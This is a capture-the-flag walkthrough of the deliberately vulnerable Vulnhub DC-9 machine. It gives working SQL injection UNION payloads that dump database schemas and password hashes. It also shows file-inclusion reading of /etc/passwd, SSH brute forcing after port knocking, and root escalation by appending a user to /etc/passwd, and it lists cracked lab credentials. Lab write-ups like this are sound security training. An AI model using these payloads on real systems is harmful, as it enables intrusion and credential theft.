# Vulnhub-DC 9
## NMAP
```bash
nmap -sC -sV 192.168.1.7
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-16 09:31 PKT
Nmap scan report for 192.168.1.7
Host is up (0.00021s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
| 256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_ 256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 08:00:27:1B:8F:38 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## PORT 80 (HTTP)
Going to `Display All Records`
we can see information of users
We can a login page , lets' try to do some basic sqli stuff
I tried `admin ' or 1=1 #` , `admin' or 1=1 -- ` , but both failed
Going over to `search.php` we can see that it searches for a name so let's supply the name `mary` since information for that user exists
Here let's perform a query `mary' and 1=1 # ` to see if it still returns us information of mary
It does , so here we can actually sqli but first we need to identify how many columns are there to do that we are going to ultize `order by ` which will sort by value of the number of column of provide , we will keep increasing the number we get no repsonse so,
`mary' order by 1 #`
I kept getting result till till 6 columns but after that I get no response
Which means we have 6 columns so we can now perform sql injection
`mary' union select version(),user(),database(),4,5,6 #`
This machine is using MariaDB, user for the database client is dbuser and the database name is Staff , now we need to extract table name ,then the columns and the exfiltrate the data
We can only perform a query to give us all the names for database
```
mary' union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata #
```
So there two databases but right now let's just focus on `Staff`
```
mary' union select group_concat(table_name),2,3,4,5,6 from information_schema.tables where table_schema=database() #
```
We have two tables , `StaffDetails` and `Users` so let's see column names for Users table
```
mary' union select group_concat(column_name),2,3,4,5,6 from information_schema.columns where table_name='Users' #
```
We have the column names , we are intersted in username and password so let's just extract the data
And we got the user name password hash , this could have been done with sqlmap easilty by just intercepting the request from `search.php` and saving it to a file and running it against sqlmap
Let's visit crackstation
As soon as we log in we'll get an error
I tried the parameter `file` and got the contents of `/etc/passwd`
So I copied the results in a file and grab the users only
Now remeber that we had 2 databases `Staff` and `users` , let's use sqlmap to dump data from users database
I have already saved the usernames ,let's just grab the password and start brute forcing aginst SSH
But ssh is filtered so we are going to first see if we can find a port knocking configuration or not
Now can perform port-knocking to open ssh port
We found 2 passwords with brute forcing
After logging in with `janitor` we can find more passwords
Let's add those passwords and again try brute forcing
Switching to user `fredf` we can that can run the file test as sudo
It's a binary , let's try to execute it and see what happens
Wierd it says test.py which is a python file which reads and appends so we need to find that python file
And we found it
So going through the source code , it's going to take 2 arguments as file , it's going to read the contents from first file store it in variable then it's going to append the contents in the file we specify we could exploit this by first adding a root user in a file then reading the contents from there and appending it to `/etc/passwd` file
Now let's see if this actually worked or not
This has added a user so we can switch to this user and become root
admin:transorbital1
```
chandlerb:UrAG0D!
janitor: Ilovepeepee
joeyt: Passw0rd
fredf: B4-Tru3-001
```
mary' union select 1,2,3,4,5,6 #
mary' union select group_concat(table_name),2,3,4,5,6 from information_schema.tables where table_schema=database() #
mary' union select group_concat(column_name),2,3,4,5,6 from information_schema.columns where table_name='Users' #
mary' union select group_concat(Username),group_concat(Password),3,4,5,6 from 'Users' #
mary' union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata #